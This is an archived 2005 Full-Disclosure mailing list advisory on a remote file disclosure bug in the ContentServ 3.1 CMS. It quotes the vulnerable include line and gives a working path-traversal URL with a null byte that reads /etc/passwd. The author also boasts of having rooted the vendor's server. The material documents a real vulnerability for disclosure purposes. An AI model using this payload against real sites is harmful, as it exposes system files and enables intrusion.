| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun Sep 25 14:36:13 2005
From: qobaiashi at gmx.net (qobaiashi@....net)
Subject: ContentServ features remote file disclosure
----------------------------------------------------------------------
--[ ContentServ (still) features remote reading of arbitrary files ]--
-------------------------[ qobaiashi@....net ]------------------------
/* Boring PHP bug warning:
* """"""""""""""""""""""""""""""
* By reading boring PHP bug advisories it is possible to
* fall asleep (if not affected) instantly w/o a warning!
*
* I told you, it's your decision now.
*/
ContentServ is a cms developed by ... ContentServ.de and is a quite
commonly used cms system at least in .de.
Some months ago while pentesting www.contentserv.com i've found a bug
(yo alex i rooted you back then but somehow you didn't need sec support)
in ContentServ 3.1. which - to my surprise - is still accessible on some
installations. Somebody should have read the apache logs over there ;)
I had some fun with it (the bug and your server) back then.
The bug resides in /admin/about.php:
[...]
include("../$ctsWebsite/data/config.php");
[...]
This boils down to a damn stupid:
www.we-cant-design-our-hp.com/contentserv/3.1/admin/about.php?
ctsWebsite=../../../../../../../../../../etc/passwd%00
to give you some informations.
-----------------------------
Disclosure timeline:
Bug found: 2004
Bug disclosed: Son Sep 25 16:04:40 CEST 2005
Bug fixed: ask your vendor
have fun.
-q
Powered by blists - more mailing lists